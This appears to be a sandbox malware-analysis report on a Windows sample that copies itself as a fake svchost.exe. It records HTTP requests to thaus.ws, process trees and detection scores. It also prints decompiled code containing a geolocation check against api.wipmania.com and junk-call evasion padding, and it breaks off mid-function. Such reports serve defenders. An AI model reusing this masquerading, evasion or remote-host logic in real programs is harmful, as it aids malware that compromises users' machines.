Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49788	64.70.19.203	80	C:\16642873124159\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Jan 18, 2021 00:45:06.676374912 CET	6289	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: thaus.ws

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49789	64.70.19.203	80	C:\16642873124159\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Jan 18, 2021 00:45:07.176433086 CET	6289	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: thaus.ws

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Br6Pmt0MiZ.exe PID: 5220 Parent PID: 5552

General

Start time:	00:40:10
Start date:	18/01/2021
Path:	C:\Users\user\Desktop\Br6Pmt0MiZ.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Br6Pmt0MiZ.exe'
Imagebase:	0x8b0000
File size:	38400 bytes
MD5 hash:	85C4F05BDC2C39858288C67D41DB3E86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 68 Parent PID: 5220

General

Start time:	00:40:24
Start date:	18/01/2021
Path:	C:\16642873124159\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\16642873124159\svchost.exe
Imagebase:	0xab0000
File size:	38400 bytes
MD5 hash:	85C4F05BDC2C39858288C67D41DB3E86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 47%, Metadefender, Browse Detection: 90%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 5276 Parent PID: 568

General

Start time:	00:40:32
Start date:	18/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5924 Parent PID: 568

General

Start time:	00:40:35
Start date:	18/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 1720 Parent PID: 3388

General

Start time:	00:40:35
Start date:	18/01/2021
Path:	C:\16642873124159\svchost.exe
Wow64 process (32bit):	true
Commandline:	'C:\16642873124159\svchost.exe'
Imagebase:	0xab0000
File size:	38400 bytes
MD5 hash:	85C4F05BDC2C39858288C67D41DB3E86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 4424 Parent PID: 3388

General

Start time:	00:40:43
Start date:	18/01/2021
Path:	C:\16642873124159\svchost.exe
Wow64 process (32bit):	true
Commandline:	'C:\16642873124159\svchost.exe'
Imagebase:	0xab0000
File size:	38400 bytes
MD5 hash:	85C4F05BDC2C39858288C67D41DB3E86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 2440 Parent PID: 568

General

Start time:	00:40:45
Start date:	18/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5624 Parent PID: 568

General

Start time:	00:40:46
Start date:	18/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5628 Parent PID: 568

General

Start time:	00:40:47
Start date:	18/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5620 Parent PID: 568

General

Start time:	00:40:47
Start date:	18/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 3032 Parent PID: 568

General

Start time:	00:40:48
Start date:	18/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6200 Parent PID: 568

General

Start time:	00:40:48
Start date:	18/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6296 Parent PID: 568

General

Start time:	00:40:49
Start date:	18/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6392 Parent PID: 3388

General

Start time:	00:40:52
Start date:	18/01/2021
Path:	C:\16642873124159\svchost.exe
Wow64 process (32bit):	true
Commandline:	'C:\16642873124159\svchost.exe'
Imagebase:	0xab0000
File size:	38400 bytes
MD5 hash:	85C4F05BDC2C39858288C67D41DB3E86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 1156 Parent PID: 6296

General

Start time:	00:41:50
Start date:	18/01/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Imagebase:	0x7ff6e50a0000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5136 Parent PID: 1156

General

Start time:	00:41:50
Start date:	18/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6480 Parent PID: 568

General

Start time:	00:42:53
Start date:	18/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6728 Parent PID: 568

General

Start time:	00:44:54
Start date:	18/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 7068 Parent PID: 568

General

Start time:	00:44:56
Start date:	18/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s wisvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Br6Pmt0MiZ.exe PID: 5220 Parent PID: 5552 Br6Pmt0MiZ.exeCOMMON

Execution Graph

Execution Coverage:	13.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14.8%
Total number of Nodes:	513
Total number of Limit Nodes:	15

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 008B2930, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 67
networkfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E008B2930() {
				void _v108;
				void* _v112;
				long _v116;
				void* _v120;
				char* _v124;
				void* _t20;
				void* _t24;

				memset( &_v108, 0, 0x64);
				_t20 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0); // executed
				_v120 = _t20;
				if(_v120 == 0) {
					L6:
					InternetCloseHandle(_v120);
					return 0;
				}
				_t24 = InternetOpenUrlA(_v120, "http://api.wipmania.com/", 0, 0, 0, 0); // executed
				_v112 = _t24;
				if(_v112 == 0) {
					L5:
					InternetCloseHandle(_v112); // executed
					goto L6;
				}
				InternetReadFile(_v112,  &_v108, 0x63,  &_v116); // executed
				_v124 = E008B29F0( &_v108, 0x3e);
				if(_v124 == 0) {
					goto L5;
				}
				_v124 =  &(_v124[1]);
				if(strcmp(_v124, "UA") != 0) {
					goto L5;
				}
				return 1;
			}

0x008b293e
0x008b2953
0x008b2959
0x008b2960
0x008b29d9
0x008b29dd
0x00000000
0x008b29e3
0x008b2973
0x008b2979
0x008b2980
0x008b29cf
0x008b29d3
0x00000000
0x008b29d3
0x008b2990
0x008b29a4
0x008b29ab
0x00000000
0x00000000
0x008b29b3
0x008b29c9
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 008B293E
InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36,00000000,00000000,00000000,00000000), ref: 008B2953
InternetOpenUrlA.WININET(00000000,http://api.wipmania.com/,00000000,00000000,00000000,00000000), ref: 008B2973
InternetReadFile.WININET(00000000,?,00000063,?), ref: 008B2990

Part of subcall function 008B29F0: strchr.MSVCRT ref: 008B29FB

strcmp.MSVCRT ref: 008B29BF
InternetCloseHandle.WININET(00000000), ref: 008B29D3
InternetCloseHandle.WININET(00000000), ref: 008B29DD

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36, xrefs: 008B294E
http://api.wipmania.com/, xrefs: 008B296A

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: Internet$CloseHandleOpen$FileReadmemsetstrchrstrcmp
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36$http://api.wipmania.com/
API String ID: 2867819534-2731082668
Opcode ID: eafcda0e045c75270e520a5b60b993db435b8e743445a6095114a5368c9b0181
Instruction ID: 22091e7ec6f9a0062bae569df686214e7539cdad469a44465dd632987d94c448
Opcode Fuzzy Hash: eafcda0e045c75270e520a5b60b993db435b8e743445a6095114a5368c9b0181
Instruction Fuzzy Hash: 2E211D71E40308ABEB20EBB4DC4AFDD7B78FB04B01F204619B615AB2C2E675A554CF51

Uniqueness

Uniqueness Score: -1.00%

Function 008B16D0, Relevance: 1.5, APIs: 1, Instructions: 10
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(008BA8A0,00000000,00000000,00000018,F0000000,?,008B3EB1), ref: 008B16E3

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: AcquireContextCrypt
String ID:
API String ID: 3951991833-0
Opcode ID: f4ef14e99660966b8a119267dad9f5a453d35a893ff4aba3275da4cd781d66a9
Instruction ID: dde99f104a797eadf8df815806bd89901bff92e271cd5896ea3bb23a2b5bf7e7
Opcode Fuzzy Hash: f4ef14e99660966b8a119267dad9f5a453d35a893ff4aba3275da4cd781d66a9
Instruction Fuzzy Hash: F6B092302C470C72E6202282AC07F803618A304F11F700010B709786D199D5301101AE

Uniqueness

Uniqueness Score: -1.00%

Function 008B2AB0, Relevance: 919.3, APIs: 492, Strings: 32, Instructions: 2324
filesleepnetworkCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E008B2AB0() {
				short _v524;
				char _v528;
				short _v1052;
				void _v1116;
				char _v1118;
				short _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				void _v1164;
				char _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				char _v1184;
				char _v1212;
				short _v1284;
				char _v1288;
				intOrPtr _v1292;
				char _v1296;
				int _v1300;
				intOrPtr _v1304;
				intOrPtr _v1308;
				intOrPtr _v1312;
				intOrPtr _v1316;
				intOrPtr _v1320;
				intOrPtr _v1324;
				intOrPtr _v1328;
				intOrPtr _v1332;
				intOrPtr _v1336;
				int _v1340;
				char _v1342;
				short _v1344;
				intOrPtr _v1348;
				intOrPtr _v1352;
				intOrPtr _v1356;
				char _v1360;
				short _v1884;
				void* _v1888;
				short _v1892;
				intOrPtr _v1896;
				intOrPtr _v1900;
				intOrPtr _v1904;
				char _v1908;
				void _v1956;
				short* _v1960;
				short* _v1964;
				short* _v1968;
				short* _v1972;
				short* _v1976;
				short* _v1980;
				short* _v1984;
				short* _v1988;
				char _v2508;
				char _v2536;
				short* _v2540;
				short* _v2544;
				short* _v2548;
				short* _v2552;
				short* _v2556;
				short* _v2560;
				short _v2564;
				intOrPtr _v2568;
				intOrPtr _v2572;
				intOrPtr _v2576;
				intOrPtr _v2580;
				char _v2584;
				intOrPtr _v2588;
				intOrPtr _v2592;
				intOrPtr _v2596;
				intOrPtr _v2600;
				intOrPtr _v2604;
				short _v2608;
				intOrPtr _v2612;
				short _v3132;
				char _v3396;
				char _v3424;
				WCHAR* _v3428;
				char _v3948;
				short _v3952;
				intOrPtr _v3956;
				intOrPtr _v3960;
				intOrPtr _v3964;
				intOrPtr _v3968;
				char _v3972;
				char _v3976;
				intOrPtr _v3980;
				intOrPtr _v3984;
				intOrPtr _v3988;
				char _v3992;
				void _v4068;
				void _v4108;
				char _v4132;
				void* _v4136;
				intOrPtr _v4140;
				intOrPtr _v4144;
				intOrPtr _v4148;
				intOrPtr _v4152;
				char _v4156;
				short* _v4160;
				short* _v4164;
				short* _v4168;
				struct HWND__* _v4172;
				intOrPtr _v4176;
				struct HWND__* _v4180;
				void* _v4184;
				intOrPtr _v4188;
				intOrPtr _v4192;
				void* _v4196;
				intOrPtr _v4200;
				intOrPtr _v4204;
				int _v4208;
				int _v4212;
				struct HWND__* _v4216;
				struct HWND__* _v4220;
				int _v4224;
				struct HWND__* _v4228;
				int _v4232;
				int _v4236;
				struct HWND__* _v4240;
				struct HWND__* _v4244;
				int _v4248;
				int _v4252;
				intOrPtr _v4256;
				struct HWND__* _v4260;
				void* _v4264;
				intOrPtr _v4268;
				intOrPtr _v4272;
				void* _v4276;
				intOrPtr _v4280;
				intOrPtr _v4284;
				struct HWND__* _v4288;
				struct HWND__* _v4292;
				int _v4296;
				struct HWND__* _v4300;
				intOrPtr _v4304;
				struct HWND__* _v4308;
				void* _v4312;
				intOrPtr _v4316;
				long _v4320;
				void* _v4324;
				intOrPtr _v4328;
				intOrPtr _v4332;
				struct HWND__* _v4336;
				struct HWND__* _v4340;
				int _v4344;
				signed int _v4348;
				struct HWND__* _v4352;
				intOrPtr _v4356;
				struct HWND__* _v4360;
				void* _v4364;
				intOrPtr _v4368;
				intOrPtr _v4372;
				void* _v4376;
				intOrPtr _v4380;
				intOrPtr _v4384;
				int _v4388;
				int _v4392;
				struct HWND__* _v4396;
				struct HWND__* _v4400;
				int _v4404;
				struct HWND__* _v4408;
				int _v4412;
				int _v4416;
				signed int _v4420;
				signed int _v4424;
				signed char _t574;
				intOrPtr _t576;
				intOrPtr _t577;
				intOrPtr _t578;
				intOrPtr _t580;
				short _t581;
				intOrPtr _t587;
				intOrPtr _t588;
				intOrPtr _t589;
				char _t591;
				intOrPtr _t592;
				intOrPtr _t593;
				intOrPtr _t594;
				intOrPtr _t595;
				char _t596;
				intOrPtr _t597;
				short _t598;
				short _t601;
				void* _t603;
				long _t607;
				void* _t614;
				char* _t616;
				char* _t619;
				char* _t621;
				signed int _t625;
				signed char _t630;
				char* _t688;
				char* _t691;
				char* _t706;
				signed int _t714;
				signed int _t716;
				signed int _t718;
				int _t724;
				int _t726;
				long _t732;
				long _t733;
				long _t734;
				signed char _t736;
				int _t738;
				int _t742;
				int _t747;
				struct HWND__* _t752;
				int _t753;
				struct HWND__* _t850;
				int _t912;
				struct HWND__* _t913;
				struct HWND__* _t983;
				int _t984;
				void* _t1093;
				char _t1094;
				intOrPtr _t1095;
				intOrPtr _t1096;
				intOrPtr _t1099;
				char _t1100;
				intOrPtr _t1111;
				char _t1112;
				intOrPtr _t1113;
				intOrPtr _t1116;
				char _t1117;
				intOrPtr _t1118;
				short _t1119;
				intOrPtr _t1120;
				char _t1121;
				intOrPtr _t1122;
				intOrPtr _t1127;
				char _t1128;
				char _t1231;
				short _t1232;
				intOrPtr _t1233;
				char _t1234;
				intOrPtr _t1235;
				char _t1236;
				intOrPtr _t1237;
				intOrPtr _t1238;
				short _t1239;
				intOrPtr _t1240;
				char _t1241;
				intOrPtr _t1242;
				char _t1243;
				intOrPtr _t1244;
				intOrPtr _t1245;
				intOrPtr _t1246;
				intOrPtr _t1247;
				void* _t1394;
				void* _t1395;
				void* _t1405;
				void* _t1408;
				void* _t1409;
				void* _t1410;
				void* _t1411;
				void* _t1426;
				void* _t1431;

				E008B55C0(0x1144, _t1093);
				Sleep(0x7d0); // executed
				_v1300 = 0;
				_v2612 = 0x2378;
				while(_v1300 < _v2612) {
					_t983 = FindWindowA("3r38r38r838r838r388r838r83", 0); // executed
					_v4172 = _t983;
					if(_v4172 == 0) {
						L38:
						_t984 = PathFileExistsW(L"3r37grg73g7e37geg73g7eg73g7e"); // executed
						if(_t984 == 0) {
							L49:
							_v1300 = _v1300 + 1;
							continue;
						}
						_v4232 = 0;
						while(_v4232 < 0xfa0) {
							MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
							_v4232 = _v4232 + 1;
						}
						Sleep(0x1388);
						_v4228 = FindWindowA("4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
						if(_v4228 != 0) {
							DeleteFileA("3r38r38r838r838r388r838r83");
							SetForegroundWindow(_v4172);
							MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
							CopyFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
							DeleteFileA("3r38r38r838r838r388r838r83");
							SetFocus(_v4172);
							DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
							DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
							Sleep(0xbb8);
						}
						_v4236 = 0;
						while(_v4236 < 0x384) {
							DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
							Sleep(0x1388);
							MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
							_v4236 = _v4236 + 1;
						}
						goto L49;
					}
					Sleep(0xfa0);
					MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
					Sleep(0x3e8);
					DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
					Sleep(0x2328);
					MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
					_v4208 = 0;
					while(_v4208 < 0x384) {
						MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
						Sleep(0xfa0);
						MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
						Sleep(0xbb8);
						DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
						Sleep(0x7d0);
						DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
						MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
						Sleep(0xfa0);
						DeleteFileA("3r38r38r838r838r388r838r83");
						_v4208 = _v4208 + 1;
					}
					Sleep(0x3e8);
					DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
					Sleep(0x1770);
					DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
					MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
					Sleep(0x1388);
					DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
					_v4196 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
					DeleteFileW(L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
					if(_v4196 == 0) {
						L14:
						Sleep(0x1b58);
						DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
						InternetCloseHandle(_v4196);
						Sleep(0x2710);
						MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
						DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
						ShowWindow(_v4172, 1);
						SetForegroundWindow(_v4172);
						DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
						CloseWindow(_v4172);
						MoveFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t");
						_v4204 = 0x16;
						_v4188 = 0x2c;
						_v4200 = _v4204 + _v4188;
						if(_v4200 < 0x384) {
							DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
							MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
							Sleep(0x7d0);
							DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
							DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
							_v4216 = FindWindowA("2uu5uii55i5i25i52i5ii2525i5i25i", 0);
							_v4196 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
							if(_v4196 != 0) {
								Sleep(0x1f40);
								MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
								DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
								_v4184 = InternetOpenUrlA(_v4196, "http://www.yandex.ru/", 0, 0, 0, 0);
								if(_v4184 != 0) {
									DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
									Sleep(0x1388);
									DeleteFileA("3r38r38r838r838r388r838r83");
									MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"nw55n5nww5n5nww5nw5n5n5n5n");
									MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
									Sleep(0xfa0);
									DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								}
								InternetCloseHandle(_v4184);
								Sleep(0xdac);
							}
							InternetCloseHandle(_v4196);
							Sleep(0x1388);
							if(_v4216 != 0) {
								ShowWindow(_v4216, 0);
								DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
								SetForegroundWindow(_v4216);
								Sleep(0xdac);
								_v4196 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
								if(_v4196 != 0) {
									_v4184 = InternetOpenUrlA(_v4196, "http://www.yandex.ru/", 0, 0, 0, 0);
									if(_v4184 != 0) {
										DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
										Sleep(0x1388);
										MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
										Sleep(0xbb8);
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
									}
									InternetCloseHandle(_v4184);
									DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
									Sleep(0x64);
									MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
									DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
									DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
									Sleep(0x7d0);
								}
								InternetCloseHandle(_v4196);
							}
						}
						_v4192 = 0xf84b;
						_v4176 = 0x164;
						while(_v4192 > _v4176) {
							_v4220 = FindWindowA("4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
							if(_v4220 != 0) {
								Sleep(0x7d0);
								DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
								MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
								Sleep(0x1388);
								DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								Sleep(0x1388);
								_v4176 = _v4176 + 1;
							}
						}
						if(PathFileExistsA("2uu5uii55i5i25i52i5ii2525i5i25i") != 0) {
							DeleteFileA("3r38r38r838r838r388r838r83");
							Sleep(0xfa0);
							DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
							Sleep(0x1f4);
							MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
						}
						_v4180 = FindWindowA("3r37g37e7g3ge3ge7g37ge737eg", 0);
						if(_v4180 != 0) {
							Sleep(0x1388);
							DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
							SetForegroundWindow(_v4172);
